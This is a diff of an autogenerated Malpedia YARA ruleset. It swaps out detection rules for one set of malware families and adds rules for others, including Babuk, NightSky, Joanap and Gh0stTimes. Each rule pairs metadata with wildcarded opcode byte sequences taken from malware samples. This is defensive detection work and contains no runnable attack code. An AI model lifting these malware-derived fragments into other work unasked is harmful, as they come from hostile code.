-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.auriga_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_088"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_088_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "916cc30b11a1636c868f6de19248b0e5c25381e64e7d76c56c161fbf71269000"
+		logic_hash = "78ec2fb1a46515f7a2bd494609b3c1be4370bea522de5daa065ff46bd4f8b68d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89705,71 +89731,71 @@ rule MALPEDIA_Win_Auriga_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 59 8945fc 897df8 763a }
-		$sequence_1 = { 83c10c 894df4 8b11 3b15???????? 755b 8bd0 2b55fc }
-		$sequence_2 = { ffd7 33c0 8985c0fbffff 8985ccfbffff 8985d0fbffff 8d85bcfbffff }
-		$sequence_3 = { 33c0 83c40c 8d7dec ab ab 33c0 6a20 }
-		$sequence_4 = { 59 648b01 8b400c 8b701c ad 8b4008 }
-		$sequence_5 = { 742d 8b430c 8b580c 53 ffd7 84c0 7420 }
-		$sequence_6 = { 8b0d???????? 03c1 3900 74f0 8b15???????? 56 }
-		$sequence_7 = { 59 59 8945fc 897df8 763a 8b45e8 03c7 }
-		$sequence_8 = { 0f8ce7010000 8d85e8f9ffff 50 8d85e0f9ffff }
-		$sequence_9 = { 8945e8 a1???????? 8b1c30 8bfb 8d45f0 8d5001 8a08 }
+		$sequence_0 = { 8b0e e8???????? 89c7 31c0 85f6 7402 8b06 }
+		$sequence_1 = { 8b0a 0faf0e 01c6 e9???????? 3b5de0 0f8f78010000 8b470c }
+		$sequence_2 = { c74424085b040000 8b4dd4 ba???????? c7442404???????? c70424???????? e8???????? 83ec0c }
+		$sequence_3 = { 8b08 e8???????? 8945a0 8b4508 8b00 8b00 85c0 }
+		$sequence_4 = { c78564ffffff00000000 eb62 76bb 89c7 890424 c1ff1f c744241017000000 }
+		$sequence_5 = { b8a1b0b912 8b4dd0 83cbff 8901 85f6 0f849a000000 8b16 }
+		$sequence_6 = { c745d400000000 31db 8945bc 8b4dbc 394dd4 7c17 }
+		$sequence_7 = { e8???????? eb2e 898554ffffff e8???????? 8b8554ffffff 83f816 7ed2 }
+		$sequence_8 = { c21000 55 b9???????? 89e5 83ec08 e8???????? b9???????? }
+		$sequence_9 = { 83ec0c e8???????? 8b4dc0 8b5dc4 8d75d8 }
 
 	condition:
-		7 of them and filesize < 75776
+		7 of them and filesize < 919552
 }
-rule MALPEDIA_Win_Dma_Locker_Auto : FILE
+rule MALPEDIA_Elf_Gobrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0add9e5f-70eb-5058-aac8-c8618a1495ef"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dma_locker_auto.yar#L1-L124"
+		id = "9cb05d8e-88df-5069-9152-096fc77aac24"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gobrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.gobrat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a7ffbc7fbe47962bc61977330ab1a66fd9d8632edda819d321196bb89e9e7e32"
-		score = 75
-		quality = 75
+		logic_hash = "29d6047280b8adce38a5f6a7e3d8112ab4747228198bdfc531ab746feecbff32"
+		score = 60
+		quality = 35
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bf0 85f6 0f84ab000000 e8???????? }
-		$sequence_1 = { 83c404 83c310 ff4c2414 89470c 8b7c2410 758d }
-		$sequence_2 = { ff15???????? 85c0 7404 c6461801 }
-		$sequence_3 = { 50 6a00 56 6a19 68fe010000 6894020000 6854010000 }
-		$sequence_4 = { 6a01 6a00 6a00 6a00 688a020000 6a00 6a00 }
-		$sequence_5 = { e8???????? 8bf8 83c408 85ff 7425 8b45e4 }
-		$sequence_6 = { 53 e8???????? 84c0 744f 686c060000 e8???????? 83c404 }
-		$sequence_7 = { eb0e 8b4810 8b7808 bb2b000000 894df8 33f6 56 }
-		$sequence_8 = { 6683f87f 8d642408 0f85be730000 eb00 f30f7e442404 }
-		$sequence_9 = { 83c408 85f6 0f840e040000 56 32db e8???????? }
+		$sequence_0 = { e8???????? 4889fa e9???????? 488d842400010000 488d1d22cf1700 b90b000000 488bbc2420020000 }
+		$sequence_1 = { e8???????? 488b842408010000 488b9c2400010000 488b4c2468 e8???????? e9???????? 4883f917 }
+		$sequence_2 = { 8d3431 8d76c6 0f1f440000 4883fa06 0f83bf000000 440fb644145c 4131f0 }
+		$sequence_3 = { e8???????? 488b5c2460 e8???????? 488b6c2448 4883c450 c3 4889442408 }
+		$sequence_4 = { e8???????? 488d3d2cd23b00 e8???????? 488b6c2478 4883ec80 c3 4889ca }
+		$sequence_5 = { ebd5 31f6 90 e8???????? ebcb 498b5010 4839d1 }
+		$sequence_6 = { e8???????? 488b442430 48ffc0 488b5c2420 4883c3fe 488b9424a8010000 488bb42458010000 }
+		$sequence_7 = { f20f10442428 f20f5e05???????? f20f114040 488b542450 6690 4883fa08 7e3f }
+		$sequence_8 = { e8???????? 6690 4885c9 0f8578010000 488d0d90371500 4839c8 7505 }
+		$sequence_9 = { e8???????? 488b6d00 488d05225c0500 488d4c2470 e8???????? 31c0 eb28 }
 
 	condition:
-		7 of them and filesize < 532480
+		7 of them and filesize < 12853248
 }
-rule MALPEDIA_Win_Ghole_Auto : FILE
+rule MALPEDIA_Win_Gh0Sttimes_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "42011619-6775-5fd7-9f1a-e781b1936bb7"
+		id = "aa640a7c-0e1b-5efd-8935-4547c6b03367"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ghole_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gh0sttimes_auto.yar#L1-L158"
 		license_url = "N/A"
-		logic_hash = "0d47b012ca3e41e041f7c9334a8bf5ea912b5069ddcb6bf59ee419c3c1cf9dc4"
+		logic_hash = "9c8e02eeb25677ec870ad4e3ac6e852e1b0822d6bc7051594b5abb6da5a926f8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89783,32 +89809,38 @@ rule MALPEDIA_Win_Ghole_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48 89c7 e8???????? c745cc00000000 c745b800000000 eb14 c78540ffffffe9030000 }
-		$sequence_1 = { 8878e0 49 8be9 45 8be0 44 8bea }
-		$sequence_2 = { 89f8 f7d0 89d9 21c1 48 8b45d0 48 }
-		$sequence_3 = { 83ec30 48 897dd8 48 8975d0 48 8b45d0 }
-		$sequence_4 = { 7509 83bdecf6ffffff 7448 8b855cffffff 80cc01 89855cffffff }
-		$sequence_5 = { 48 8b4040 48 8945f0 48 8b45f0 48 }
-		$sequence_6 = { 8b5010 8b45f8 0345fc 89c0 48 01c2 48 }
-		$sequence_7 = { 8b4008 8b55e4 48 8b4de8 48 89ce 48 }
-		$sequence_8 = { 48 89c7 e8???????? 85c0 7515 8b55f8 48 }
-		$sequence_9 = { 48 8b1d???????? 48 8b55a0 48 8b45c0 48 }
+		$sequence_0 = { 8bce 8bd6 8d85e0fdffff e8???????? 8b9dd8fdffff 56 }
+		$sequence_1 = { b804000000 8bcf 81f3d2b5a2c3 e8???????? }
+		$sequence_2 = { ff15???????? 8b5604 895608 ba00040000 }
+		$sequence_3 = { 894608 8b85e4fdffff 8b8de8fdffff 40 }
+		$sequence_4 = { 57 ff15???????? 8d443801 50 57 ff15???????? }
+		$sequence_5 = { 8b82ac000000 6a00 57 56 50 }
+		$sequence_6 = { ffd6 8b95f0fcffff 8b3d???????? 52 ffd7 68f4010000 }
+		$sequence_7 = { 753a 50 50 8d4d8c 51 50 }
+		$sequence_8 = { 488bcf e8???????? b902020000 488d542440 ff15???????? }
+		$sequence_9 = { 32c0 e9???????? 833d????????00 4889bc24e8000000 7412 }
+		$sequence_10 = { 48c747300f000000 48897728 488bcf 40887718 }
+		$sequence_11 = { 84c0 7515 488d8c24a0010000 e8???????? }
+		$sequence_12 = { 33d2 4d8b8938010000 4889442428 33c9 }
+		$sequence_13 = { 498d9550010000 498d8d98000000 41b804000000 e8???????? 498d8d00010000 }
+		$sequence_14 = { 03c2 0fb6c0 2bc2 410fb652fe }
+		$sequence_15 = { 48895c2408 4889742420 57 4881ecd0040000 }
 
 	condition:
-		7 of them and filesize < 622592
+		7 of them and filesize < 548864
 }
-rule MALPEDIA_Win_Crylocker_Auto : FILE
+rule MALPEDIA_Win_Jssloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8c49832e-3a15-5c26-a16b-f08cf4de197b"
+		id = "7148d41e-3b6b-5706-b0f5-a23188997a17"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crylocker_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jssloader_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "9984a5545190dc600307a66e2e0bae93c274e609548786d31df4138b67fc5f5d"
+		logic_hash = "ffccc96c8251d57f1e22bfb5c0a6de3c234295ba8c011aea9715fb2c8123c39a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89822,32 +89854,32 @@ rule MALPEDIA_Win_Crylocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d542408 68c5090000 52 e8???????? 8d442410 68???????? }
-		$sequence_1 = { ff15???????? 6afe e8???????? 83c404 5f 5e }
-		$sequence_2 = { 56 8da42400000000 8b44241c 8bf7 }
-		$sequence_3 = { 53 33ff ff15???????? 8bf0 3bf3 762e 3bfb }
-		$sequence_4 = { 8b7c242c 8b7704 50 e8???????? 8b4c2440 8bd8 51 }
-		$sequence_5 = { 8d442430 50 e8???????? 8d4c2434 68???????? 51 e8???????? }
-		$sequence_6 = { 50 50 8b44244c 50 6a00 6a00 56 }
-		$sequence_7 = { 50 894608 e8???????? 83c414 eb76 }
-		$sequence_8 = { 81c4cc000000 c3 5f 5e 5d b8fdffffff 5b }
-		$sequence_9 = { e8???????? 8d4c2408 6aff 51 e8???????? 8d542410 6a02 }
+		$sequence_0 = { 3d55555515 0f846b010000 8b4b08 8d7001 2bcf b8abaaaa2a f7e9 }
+		$sequence_1 = { c645cc00 898570feffff 3bf0 7432 8bbd64feffff 8b4de4 03cf }
+		$sequence_2 = { 8d4de4 e8???????? 8a75d7 8b75e8 8b5dec 8b45c4 }
+		$sequence_3 = { 7e0f 803c0f22 0f84d6000000 41 3bc8 7cf1 33c0 }
+		$sequence_4 = { c785bcfdffff00000000 c785c0fdffff0f000000 c685acfdffff00 83fa10 722f 8b8d64fdffff 42 }
+		$sequence_5 = { 83c404 85c0 0f844a010000 8d7823 83e7e0 8947fc eb13 }
+		$sequence_6 = { c7805413440002000000 6a04 58 6bc000 8b0d???????? 894c05f8 6a04 }
+		$sequence_7 = { c745c800000000 c645fc02 3b4dec 741a 33d2 33f6 8911 }
+		$sequence_8 = { 8875d7 3bf9 7408 8817 47 897de8 eb13 }
+		$sequence_9 = { b8abaaaa2a 2bcf 895df0 f7e9 8b4b04 c1fa03 2bcf }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 581632
 }
-rule MALPEDIA_Win_Saint_Bot_Auto : FILE
+rule MALPEDIA_Win_Joanap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9b3de383-83bb-59eb-ab8e-cf55885e5316"
+		id = "59ddd497-e48f-5e4c-aaa1-e68a7dcd2888"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.saint_bot_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.joanap_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "c120f50dc769e408884483c5952b8e78bb4b0a03aaa97a8ecb7b623ae2701d23"
+		logic_hash = "2db58924366bc00afcca8a8ac59fc7a0399fb6bba1dea50a7dd31138b4827114"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89861,32 +89893,32 @@ rule MALPEDIA_Win_Saint_Bot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 ff15???????? 6800018000 eb11 6a50 }
-		$sequence_1 = { 668975d4 8d4508 33f6 c745b418000000 683f000f00 50 }
-		$sequence_2 = { 3d2b040000 7415 3d3f040000 740e }
-		$sequence_3 = { 8945f8 e8???????? 68???????? 8945f0 }
-		$sequence_4 = { 56 ff15???????? ff15???????? 3db7000000 741c }
-		$sequence_5 = { 58 6a6e 668945f0 58 6a74 668945f2 }
-		$sequence_6 = { 6a00 56 68???????? 53 ff15???????? 8bf0 }
-		$sequence_7 = { 897dec 897df8 ffd6 6808020000 57 8bd8 ffd6 }
-		$sequence_8 = { ff75dc ffd6 ff75d4 ffd6 e8???????? }
-		$sequence_9 = { ffd6 ff75f0 ffd6 ff75f4 ffd6 ff75f8 ffd6 }
+		$sequence_0 = { 89510c 8b0d???????? dd442418 dd5c0810 8d9c2488030000 c744241432000000 8b43f0 }
+		$sequence_1 = { 8d4c240a 6a01 51 56 ff15???????? 6a00 }
+		$sequence_2 = { 8844241a 8844241b a1???????? 89442408 8b8590010000 33d2 56 }
+		$sequence_3 = { 8b3d???????? 8d4c2414 51 56 ffd7 85c0 a3???????? }
+		$sequence_4 = { 8d8c24b0000000 51 56 ffd7 85c0 a3???????? 750c }
+		$sequence_5 = { 893d???????? ff15???????? 8b842494000000 6a01 6820bf0200 53 66c74304feff }
+		$sequence_6 = { 66c74424380040 e8???????? 83c414 83f8ff 0f8468010000 668b4610 6689442424 }
+		$sequence_7 = { 83c404 eb58 8d4e03 51 e8???????? 83c404 eb4a }
+		$sequence_8 = { 8bac2424100000 8b3d???????? 8b1d???????? 894820 6a01 }
+		$sequence_9 = { 6a01 6820bf0200 8d442418 6a04 50 56 }
 
 	condition:
-		7 of them and filesize < 93184
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Hopscotch_Auto : FILE
+rule MALPEDIA_Win_Nightsky_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e03bc4c7-2cba-5076-a6ca-4697985738a4"
+		id = "49806bb3-db04-5175-bd2d-05a084f5301e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hopscotch_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nightsky_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "9400f209885075e787eb0bd6132b5f0672b265a98357e610aebd52f7df050985"
+		logic_hash = "58c0a44a79ed929ad206a6701f3a4c117bf07ad9e9a507d5d3b0ad9c115c5cd3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89900,34 +89932,34 @@ rule MALPEDIA_Win_Hopscotch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d0480 8d0480 c1e002 50 ffd7 }
-		$sequence_1 = { 55 ffd3 8bf0 85f6 0f8569ffffff 68???????? e8???????? }
-		$sequence_2 = { a1???????? 83c420 85c0 5f 5e 5b }
-		$sequence_3 = { 6800800000 8b0d???????? 8b5150 52 ffd6 53 }
-		$sequence_4 = { 85c0 5f 5e 5b 7414 }
-		$sequence_5 = { 83c724 3bf0 72d8 eb2a 8b942430020000 8b4c2410 }
-		$sequence_6 = { c3 81ec08020000 8d442400 56 8d4c2408 }
-		$sequence_7 = { 6a21 50 e8???????? 83c408 c78424a400000002000000 8db42428010000 }
-		$sequence_8 = { 833d????????01 750d 8b442404 50 e8???????? 83c404 }
-		$sequence_9 = { 8b3d???????? 83c408 8d442408 50 ffd7 }
+		$sequence_0 = { 8bda 420fb6bc3010680500 418bc3 c1e708 48c1e810 0fb6c8 420fb6843110680500 }
+		$sequence_1 = { 83f806 0f879c010000 488d155277ffff 4898 8b8c82948a0000 4803ca ffe1 }
+		$sequence_2 = { 488bd7 498bcc ff15???????? 4c8d4c2470 48895c2420 41b800000800 498bd6 }
+		$sequence_3 = { 4883c602 66833e00 758d 483bf5 765e 482bf5 48d1fe }
+		$sequence_4 = { 488905???????? 4885db 488d059af90400 488905???????? b830000000 480f44d8 486305???????? }
+		$sequence_5 = { 4983f940 72eb e9???????? 488d059e1f0000 48b90000000000000080 488987c8000000 488d0576900200 }
+		$sequence_6 = { 488d05ba8b0200 c7475001000000 48c7475804000000 48894778 488d0508520300 c7476801000000 48c7477004000000 }
+		$sequence_7 = { e8???????? 486305???????? 4c8d0516060500 83f814 0f8d99000000 488bc8 488d0480 }
+		$sequence_8 = { 458b849610710500 48c1eb18 4533848e10810500 4533848610640500 410fb6c3 49c1eb08 410fb6ca }
+		$sequence_9 = { 0fb64103 468b8c8710750500 0fb6943810630500 0fb64102 44338c9710640500 0fb6943810630500 }
 
 	condition:
-		7 of them and filesize < 1143808
+		7 of them and filesize < 19536896
 }
-rule MALPEDIA_Win_Ghostemperor_Auto : FILE
+rule MALPEDIA_Win_Babuk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eb9bf224-db51-5bdd-bed6-58106efc8832"
+		id = "77f91e38-4269-56c5-a99d-eaf5692c6027"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostemperor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ghostemperor_auto.yar#L1-L226"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.babuk_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "7df60cceb98a60fe2e2f53ccef69a2b508e5a3019ab430e008473c427496d31f"
+		logic_hash = "e2bb83a66a607df7c2662bebeca5bbfe5fab26f1661308e86fffacc36a5ed578"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -89939,46 +89971,38 @@ rule MALPEDIA_Win_Ghostemperor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7464800000000 488d4e18 ff15???????? 488b4e40 }
-		$sequence_1 = { 89d5 4889ce b920000000 e8???????? 4889c7 0f57c0 0f2900 }
-		$sequence_2 = { 4885c9 7443 4889ce ff15???????? }
-		$sequence_3 = { 4883c601 4883c2f8 39f1 75ec 4929d1 }
-		$sequence_4 = { 4883ec28 ff15???????? 488d542424 89c1 ff15???????? 85c0 7406 }
-		$sequence_5 = { 418d42ff 4c8d5801 4983fb04 7222 488d3cc2 4883c708 }
-		$sequence_6 = { 4839cf 0f86fb000000 488d04c1 4883c008 }
-		$sequence_7 = { 488d5108 e8???????? 8b4648 85c0 746e }
-		$sequence_8 = { 49895d38 41897530 eb18 418b07 85c0 7411 4c03f8 }
-		$sequence_9 = { 01c3 69cbe8030000 81c130750000 4883ec20 }
-		$sequence_10 = { 01c1 89ca c1ea1f c1f904 }
-		$sequence_11 = { 488364c60800 488b05???????? 8a5008 488d4810 ff15???????? }
-		$sequence_12 = { 41391e 0f84fc010000 418b06 85c0 745d 448b4540 }
-		$sequence_13 = { 052797fa04 351337a665 8945f4 488b4510 }
-		$sequence_14 = { 4154 4156 488d6898 4881ec50010000 4533f6 4c8d257b390000 488bd9 }
-		$sequence_15 = { 05f226dac9 35bcfe1eea 894534 488b4550 }
-		$sequence_16 = { c745505f007300 c74554ee005200 0f1185c8030000 c74558ec005600 c7455c05008500 0f104d50 }
-		$sequence_17 = { 00c2 488b8568020000 8854080c 488b85b0020000 }
-		$sequence_18 = { 488bcf 2b542428 83c207 e8???????? 85c0 }
-		$sequence_19 = { 0552f0384d 358e257f87 894530 488b4570 }
-		$sequence_20 = { 01d1 89ca c1e205 89cb }
-		$sequence_21 = { 3d040000c0 7567 8b542450 33c9 ff15???????? 488bf8 }
-		$sequence_22 = { 00c1 488b8568020000 488b95b0020000 884c100c }
-		$sequence_23 = { 33c0 488b6c2438 488b742440 48894f38 }
+		$sequence_0 = { ff15???????? 6800000100 e8???????? 83c404 }
+		$sequence_1 = { 50 ff15???????? 83f803 7502 }
+		$sequence_2 = { ba08000000 6bc200 8b4d08 8b540104 52 8b0401 50 }
+		$sequence_3 = { 56 57 b808000000 6bc80a 8b5508 c7040a00000000 }
+		$sequence_4 = { 3dea000000 0f85d9000000 8b55ac 52 e8???????? 83c404 }
+		$sequence_5 = { c7440a0400000000 c745fc00000000 eb09 8b45fc 83c002 8945fc }
+		$sequence_6 = { 8b85ecfdffff 8b8de4fdffff 8b948d70fdffff 89948508fdffff 8b85ecfdffff 83c001 }
+		$sequence_7 = { 8b44ca04 50 8b0cca 51 e8???????? 83c408 8945f4 }
+		$sequence_8 = { eb02 ebbe 8b4d9c 51 ff15???????? }
+		$sequence_9 = { 0f83dc000000 8b4dfc 8b5508 8b44ca04 }
+		$sequence_10 = { 8b0401 50 e8???????? 83c408 8945ec 8955f0 b908000000 }
+		$sequence_11 = { c7040100000000 c744010400000000 ba08000000 6bc200 }
+		$sequence_12 = { 894dfc 837dfc08 7d1e 8b55fc }
+		$sequence_13 = { 8985c0fdffff 83bdc0fdffff00 0f84a1000000 c785ccfdffff00000000 eb0f }
+		$sequence_14 = { ba08000000 6bc20a 8b4d08 c7040100000000 c744010400000000 }
+		$sequence_15 = { 8b8c8508fdffff 51 ff15???????? eb02 }
 
 	condition:
-		7 of them and filesize < 1115136
+		7 of them and filesize < 183296
 }
-rule MALPEDIA_Win_Murofet_Auto : FILE
+rule MALPEDIA_Win_Karma_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff4651b8-f01c-5a4b-b3ae-29bd62dfdd08"
+		id = "24be30a8-d096-5dc7-8e51-b42bf2a52649"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.murofet_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karma"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.karma_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "94ade8c85b5c2b31256b3a8187c71d11e0c07536823190c2ab9a762d80de406f"
+		logic_hash = "35cdf75103d6b4a50883eb5678dfe204820b04234b8d7ece3879561247948adf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89992,32 +90016,32 @@ rule MALPEDIA_Win_Murofet_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a2???????? 84c0 7510 e8???????? 3c04 73ce b002 }
-		$sequence_1 = { 72e5 e8???????? a2???????? 84c0 7510 }
-		$sequence_2 = { 3c02 72e5 e8???????? a2???????? 84c0 7510 }
-		$sequence_3 = { 3c04 73ce b002 a2???????? }
-		$sequence_4 = { 57 56 ff15???????? c6443eff00 83f8ff 7509 56 }
-		$sequence_5 = { e8???????? 32c0 eb43 be30750000 56 }
-		$sequence_6 = { e8???????? a2???????? 84c0 7510 e8???????? }
-		$sequence_7 = { e8???????? 3c04 73ce b002 }
-		$sequence_8 = { 84c0 7510 e8???????? 3c04 }
-		$sequence_9 = { 3c02 72e5 e8???????? a2???????? }
+		$sequence_0 = { 6a08 6a00 8944243c ffd6 50 ffd3 6a40 }
+		$sequence_1 = { 8b450c 751c 41 83f908 72f1 }
+		$sequence_2 = { 8b0d???????? 33c0 3801 740a }
+		$sequence_3 = { 8bf1 33d2 57 663916 7409 }
+		$sequence_4 = { 668901 8d5202 6685c0 75ef 8bcf ba???????? }
+		$sequence_5 = { 750e 6685db 0f8478040000 83c702 ebc8 33ff }
+		$sequence_6 = { c1c80e 33c7 8b7b14 8903 8d0437 c1c007 314324 }
+		$sequence_7 = { 8bf1 eb02 33f6 0fb74102 }
+		$sequence_8 = { 6685c0 7429 0fb7d0 6683fa5c 7410 }
+		$sequence_9 = { 66833c45f051400000 75f4 33d2 663915???????? 7415 660f1f840000000000 }
 
 	condition:
-		7 of them and filesize < 622592
+		7 of them and filesize < 49208
 }
-rule MALPEDIA_Win_Obscene_Auto : FILE
+rule MALPEDIA_Win_Sagerunex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "de7d43f1-261f-57f6-aed2-154950ae43ae"
+		id = "3bc17e45-f6b5-56f7-b7ea-e25c9e23d339"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.obscene_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sagerunex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sagerunex_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "69b57f278cfe3402f37b22931c479ec832951485342c04942f09cb1c1b23263c"
+		logic_hash = "da6b189b8ae26a86626e8770a2d7d0803155a13ac9a34b2d4bbc9044c0ab3fcc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90031,32 +90055,32 @@ rule MALPEDIA_Win_Obscene_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 6a00 6a00 ff15???????? eb09 }
-		$sequence_1 = { ff75f0 ff15???????? 50 68c03d1010 e8???????? }
-		$sequence_2 = { 0fbe00 83f830 7c0b 8b45f8 }
-		$sequence_3 = { 6828431010 68e4401010 e8???????? 59 59 682c431010 }
-		$sequence_4 = { 6a06 68???????? ff35???????? 6aff ff15???????? 68???????? }
-		$sequence_5 = { eb61 68???????? 68???????? 68???????? e8???????? 83c40c 68???????? }
-		$sequence_6 = { ff750c e8???????? 59 3da0bb0d00 733e ff75fc 6800080000 }
-		$sequence_7 = { 59 ff7508 6860ad0010 e8???????? 59 59 68bc501010 }
-		$sequence_8 = { c605????????68 c705????????d15aaa00 c605????????c3 8d45fc 50 6a06 }
-		$sequence_9 = { 55 8bec 81ec04080000 68???????? ff750c e8???????? 59 }
+		$sequence_0 = { e8???????? 0fb74b02 4803cb e8???????? 8d7701 ba04010000 e9???????? }
+		$sequence_1 = { 8bc7 ffc7 3d00010000 0f8f2a030000 488bcb e8???????? 85c0 }
+		$sequence_2 = { 4156 4157 4881ec60020000 488b05???????? 4833c4 4889842450020000 4d8bf1 }
